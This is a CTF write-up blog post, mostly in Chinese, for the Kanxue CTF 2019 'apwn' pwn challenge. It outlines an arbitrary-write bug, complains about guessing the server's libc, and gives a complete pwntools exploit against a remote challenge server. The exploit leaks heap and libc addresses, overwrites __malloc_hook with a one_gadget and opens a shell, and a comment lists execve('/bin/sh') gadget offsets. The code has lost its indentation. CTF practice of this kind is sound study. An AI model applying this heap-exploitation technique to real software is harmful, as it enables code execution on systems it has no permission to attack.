Kanxuectf_2019_apwn

apwn 情境挺有意思的

start

题目没啥好说的…任意地址写
有leak

思路

leak heap libc & modify malloc_hook..

坑点.

做题10min环境5小时
不知是否故意为了增加做出时间不给libc.没给libc结果是2.27的…做的我一脸懵逼…然后我的ubuntu18又和服务器上有点区别我的一开始在init的时候会有一个0x410的tcache所以全靠幻想在做题…

坑死人了..题目半小时左右就做好了结果为了猜环境ubuntu14,16,kali,18全试过..有些机子还没有得docker搞了3,4个小时…

exp

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
from pwn import *
def cmd(c):
p.sendlineafter(">>\n",str(c))
def add_1(name=p64(0x21)*4):
cmd(1)
p.sendafter("Name:\n",name)
def add_2(name="YY"):
cmd(2)
p.sendafter("Name\n","YY")
p.sendafter("name\n",name)
def edit_1(idx,name):
cmd(3)
p.sendlineafter("which?\n",str(idx))
p.sendafter("luck.\n",name)
def edit_2(idx,name,pname):
cmd(4)
p.sendlineafter("which?\n",str(idx))
p.sendafter("name?\n",name)
p.sendafter("name\n",pname)
def free():
cmd(5)

libc=ELF("./libc-2.27.so")
#libc=ELF("./apwn").libc
#p=process("./apwn")
p=remote("211.159.175.39",8686)

#p=remote("127.0.0.1",1026)
add_1()#0
add_2()
edit_1((0x2e0-0x60)/8,'\x60')
p.readuntil("name: ")
heap=(u64(p.readuntil("1")[:-1].ljust(8,'\x00'))-0X60)#&0xfffffffffffff000
log.warning(hex(heap))

edit_2(0,"YY",p64(0)+p64(0x431))
edit_1((0x2e0-0x60)/8,p64(heap+0x70))

for x in range(60):
add_1()#1

free()
add_1("\n")

edit_1(60,"AAAAAAAA")


p.readuntil("name: AAAAAAAA")
base=u64(p.readuntil("1")[:-1].ljust(8,'\x00'))-(0x7fce69891090-0x7fce694a5000)
libc.address=base
log.warning(hex(base))




add_2()#1
edit_1((0x2e0-0x60)/8,p64(heap+0xa0))
edit_2(0,"YY",p64(libc.symbols['__malloc_hook']))
one=0x10a38c
edit_2(1,"YY",p64(one+base))

cmd(1)
#now 0
'''
0x45216 execve("/bin/sh", rsp+0x30, environ)
constraints:
rax == NULL

0x4526a execve("/bin/sh", rsp+0x30, environ)
constraints:
[rsp+0x30] == NULL

0xf02a4 execve("/bin/sh", rsp+0x50, environ)
constraints:
[rsp+0x50] == NULL

0xf1147 execve("/bin/sh", rsp+0x70, environ)
constraints:

'''

p.interactive()

#single 0x000000000202060+0x0000555555554000
#lucky 00000000002022E0
Author: n132!
Link: https://n132.github.io/2019/04/10/2019-04-10-Kanxuectf-2019-apwn/
Copyright Notice: All articles in this blog are licensed under CC BY-NC-SA 4.0 unless stating additionally.